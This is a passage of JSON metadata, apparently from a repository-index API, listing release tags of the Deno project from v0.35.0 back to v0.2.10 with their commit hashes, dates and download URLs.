ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/t